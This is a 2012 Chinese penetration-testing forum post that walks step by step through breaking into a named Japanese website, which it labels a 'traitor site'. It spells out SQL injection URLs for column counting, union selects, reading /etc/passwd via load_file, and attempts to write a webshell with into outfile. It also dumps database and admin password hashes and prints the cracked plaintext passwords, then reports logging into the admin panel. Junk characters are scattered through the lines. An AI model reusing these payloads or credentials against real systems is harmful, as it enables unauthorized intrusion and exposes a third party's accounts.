中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

1 t$ _" Q4 [4 `$ a2 q& p6 w; M9 q
0x01. 检测 www.zuaa.jp 收集数据
; l5 @: D1 Q& Q" A1 X[attach]73[/attach]
7 ^; M$ v- U9 V4 O6 c- h7 k! t; m. m+ ~
whatweb
0 D. s, C& u/ e7 F2 [4 F2 O[attach]74[/attach]
# S4 S' U4 e& B8 u- l; M
( l/ p) F% ^+ i7 D利用NMAP扫描7 s9 i# o1 _9 I+ p, u
[attach]75[/attach]
7 B" l8 G& k; q中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 g0 ?3 w" C/ M! ^6 ^! m& o: D
0x02.找注入点
, @  [. ?* [8 d# U- O0 g/ O找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
) Y! p7 C4 ]; P( F( K9 w[attach]76[/attach]
. W1 O0 j  A9 r/ B) B2 A# k6 A7 V4 Q( l  e/ y" A
0x03.order by
8 e1 R/ y2 ~2 N6 ^$ Z  @1 e- S5 q             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 17 h7 A/ ^+ `3 |( w2 C
[attach]77[/attach]4 t% J- F" f+ a& Q# `) _% R9 }
order by 28报错,order by 27正常
! y- l* G: {! f: J7 Q
$ ^" c- ?; y& P$ G, w, L0x04.   union手动查询
2 j0 C+ o& e7 b# }3 k! S% a) Zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: I, r, m+ `# P4 ~添加到 27 时正常显示
; _; I" M/ a, X4 e+ `2 R[attach]78[/attach]
6 \& m" I9 d- ^8 D( B" T9 P中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
; z* H: _6 j" O" f) Y8 `& n" p: W& m# I* {8 K
0x05. info:3 [  h- \- ]+ V) A
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
/ ]$ [; c9 R  B2 c[attach]79[/attach]
& a2 _) N' W8 J# i( o. s5 [8 m# `user:            root@localhost
; d* y& L5 l+ Zdatabase:    openpne2 w( [; K4 X/ b8 S
version:      4.1.221 ~! O7 k1 ?) t- p8 c. r4 f0 n$ b" b
os:             portbld-freebsd5.4
" K; g0 \2 c+ D7 S
( j6 u% o2 s, \) F% D( j+ T! X9 d0x06. root用户9 s9 j* k: {0 V: k+ t
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
. L& c( B5 I& \& W( }9 a9 Z7 }+ [http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 Q% m7 |0 K- _[attach]80[/attach]6 B! u4 \* D+ E$ N% i. D- @
通过工具转换! z$ M$ L! p5 w( \
[attach]81[/attach]) e- R4 [# W" K6 p
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
) k. X9 t$ l: W8 ~3 p2 {+ `: E+ T) `/ p
0x07. 利用 into outfile
8 p/ H5 V) B* H* l3 c. s( g6 ]全部都失败
9 ]# v3 D( a4 b; jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
: R5 P: ^5 N) ]+ D. y& ~* ^# X$ K; q" t, y% n3 C' r
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
1 o8 F4 h9 j" H* P6 w  |7 r+ Z4 z. N
页面显示“MDB2 Error:syntax error”
% k& K: y) ]6 y5 i
7 C3 R1 J. O3 C# F6 M, N0x08. 利用 mysql 4.1' y0 n0 Y/ R7 }! r# n  b  I
猜常规表名,字段未果 工具 sqlmap
" E& G7 m  n4 e1 b中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
" Y+ R$ Z1 J" A8 s* v; E! {. _0 p+ T0 d  O/ R# F, M
[attach]82[/attach]+ e4 F5 a/ `/ [' ~! I+ g

7 s- h, s) d3 q0x09. 查找后台% m4 l3 P; X$ F" M1 r
利用 现有的各种 后台工具尝试都不行
; |2 K: ~/ q9 Z( P( m8 o( }  _5 x# ?3 @! u# |4 m
0x10.  MySL外联方法+ f9 u% x4 l5 E. e  h& X: \" G
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
; o9 K3 y& l+ {1 t+ I可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user. Q! ^' [! T8 G( l" U
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
& d/ d6 C$ J& ~$ Z  V[attach]83[/attach]
" Z: E4 W, u; x5 e3 h6 h. d  ]* H6 x这个可以在 www.cmd5.com 解密& n% w; h, c. T
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
+ s1 ~6 L/ I' b5 R! K6 L1 R: R$ k% z( qchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97# \$ S4 I2 C8 g0 G5 M
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
4 i- b6 Y! P7 p9 S; }. Mzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
. t4 o7 J! Y) m9 p/ I- C! c2 o工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知5 o" T0 ~' c% L& l# c8 c& q; H
[attach]84[/attach]9 _6 u7 c* b" C1 x6 e2 Z7 }( u

3 N) }" S! _$ H' k) M7 a0x11. 网站突破
" q8 R) d7 b* _发现网站的源程序 openpne, google 下载 openpne 源码) r  Y( ^2 s, K$ n- r5 e2 G
[attach]85[/attach]& Y( I& h- C6 c  Q; v' T

& w3 u) c5 c' \, Y, }0 p0x12. 默认信息利用5 _; q1 r6 c$ M2 E
http://sns.zuaa.jp/?m=admin&a=page_login
% A- L$ c4 B4 O[attach]86[/attach]
7 N4 M9 ~; _- e! V0 E( w* t( H表名 (c_admin_user) ,字段名(username,password)
( L  t- u  t5 q; K, r: r1 v7 P6 E; vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user& F  ^( J1 Y1 ~# D, D5 ]
[attach]87[/attach]! A$ }: x/ T- H0 K( u* Q
解密0 k! D* ^; J8 N' T% p3 B' F
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
8 y) ]7 G' _3 Q! Z: @% T8 A% J9 ezuaajp:c0923ec5857796a393da99905008c176,          zju1897
& d4 }8 i" P6 H0 e+ ?1 C7 Z  C! O' i) N. z" V7 A, f
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
8 y! `. |+ W# q: H- v# B, {# t3 ~) S3 S- W+ P! T4 p0 d
0x13. 登录后台
) F- W( ~; w8 q* D[attach]88[/attach]: ]6 I% G* H$ C! A
0 d+ q4 N$ P5 a' g6 _5 h" _

7 N' k8 U6 V- ?2 ^0x14. 小结
: D, ~  z' w4 O# _" {利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
4 w  ^4 G- X7 ?" M* W  B感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
' S4 d3 @( _6 X------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain2 E& e2 ~. a" \6 ^6 f
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
* F6 j8 k, k* B! o6 r; h: o. f  N( B1 P
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
% Y' v4 S$ [/ Y0 ~
作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2